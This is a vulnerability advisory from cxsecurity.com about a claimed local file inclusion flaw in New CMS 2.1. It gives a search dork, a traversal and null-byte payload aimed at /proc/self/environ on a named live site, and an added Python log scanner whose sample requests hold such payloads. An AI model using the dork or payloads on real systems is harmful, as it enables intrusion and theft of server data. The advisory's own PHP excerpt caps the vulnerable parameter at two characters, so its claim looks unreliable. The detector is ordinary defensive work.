New CMS 2.1 Local File Inclusion

2015.01.28
Credit: R3vanBastard
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

===============================================
[+] TITLE     : NEW CMS Local File Inclusion Vulnerability (/proc/self/environ)
[+] VENDOR    : http://new-cms.org/index.php?lng=it&mod=download&pg=indice
[+] VERSION   : 2.1 or Later
[+] AUTHOR    : R3vanBastard
[+] TESTED ON : Windows
[+] DORK      : "New CMS" inurl:index.php?lng=
[+] YM        : revan_blezinsky[at]yahoo.com
==================[+]VULN[+]===================

if (get_magic_quotes_gpc()) {
    $process = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST);
    while (list($key, $val) = each($process)) {
        foreach ($val as $k => $v) {
            unset($process[$key][$k]);
            if (is_array($v)) {
                $process[$key][stripslashes($k)] = $v;
                $process[] = &$process[$key][stripslashes($k)];
            } else {
                $process[$key][stripslashes($k)] = stripslashes($v);
            }
        }
    }
    unset($process);
}

define("PER", "");
include(PER."cdat.php");
include(PER."struttura/funzioni.str"); // include the file with the main functions and constants
include(CGEN."config".DTB);            // include the configuration file

if(strlen(dirname($_SERVER["SCRIPT_NAME"]))>1) {
    $DirName = dirname($_SERVER["SCRIPT_NAME"])."/";
} else {
    $DirName = "/";
}
$sito[2] = "http://".$_SERVER["SERVER_NAME"].$DirName;
$CMSVersion = "New-CMS 2.1";

if(isset($_GET['mod'])) $_GET['mod'] = Prot($_GET['mod']);
if(isset($_GET['pg']))  $_GET['pg']  = Prot($_GET['pg']);
if(isset($_GET['s']))   $_GET['s']   = Prot($_GET['s']);
if(isset($_GET['lng'])) {
    if(strlen($_GET['lng'])>2) unset($_GET['lng']);
}
============================================================
[DEMO]
http://www.salvatorecotena.it/index.php?lng=../../../../../../../../../../../../../proc/self/environ%0000 [shell? ]
===================================================================
Thanks to: My PC | Jogjamakeup.com | Mainhack | VOP CREW | Jack | rdnc.or.id | BoBy a.k.a c0li (yg botnya di gangbang)
===================================================================
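The pattern in the advisory (a traversal string, /proc/self/environ and a %00 null byte in the lng parameter) is easy to spot in web server access logs. The detector below is an added example written for this page, not code from the advisory or from New CMS; the log lines are constructed, and the set of valid language codes (ALLOWED_LNG) is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines in common log format (not from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Jan/2015:10:01:02 +0100] "GET /index.php?lng=it&mod=download&pg=indice HTTP/1.1" 200 5120
10.0.0.9 - - [28/Jan/2015:10:01:07 +0100] "GET /index.php?lng=../../../../../../proc/self/environ%0000 HTTP/1.1" 200 8831
10.0.0.9 - - [28/Jan/2015:10:01:09 +0100] "GET /index.php?lng=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1200
10.0.0.7 - - [28/Jan/2015:10:02:15 +0100] "GET /index.php?lng=en&mod=news HTTP/1.1" 200 4096
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# GET parameters New CMS 2.1 passes on to include(); the advisory exercises lng.
WATCHED_PARAMS = ("lng", "mod", "pg", "s")
ALLOWED_LNG = {"it", "en"}  # assumed set of installed language codes

def lfi_indicators(value):
    """Return the LFI indicators found in one already-decoded parameter value."""
    v = unquote(value)  # second decode catches double-encoded payloads (%252e -> %2e -> .)
    hits = []
    if "\x00" in v:
        hits.append("null-byte")
    if "../" in v or "..\\" in v:
        hits.append("traversal")
    if "/proc/self/environ" in v:
        hits.append("proc-environ")
    return hits

def scan_log(text):
    """Return (ip, parameter, indicators) for every suspicious request in the log."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)  # decodes once
        for param in WATCHED_PARAMS:
            for raw in query.get(param, []):
                indicators = lfi_indicators(raw)
                if param == "lng" and not indicators and unquote(raw) not in ALLOWED_LNG:
                    indicators.append("unknown-lng")  # a code the site never installed
                if indicators:
                    findings.append((m["ip"], param, indicators))
    return findings

if __name__ == "__main__":
    for ip, param, indicators in scan_log(SAMPLE_LOG):
        print(f"{ip} {param}: {', '.join(indicators)}")
```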



Copyright 2024, cxsecurity.com
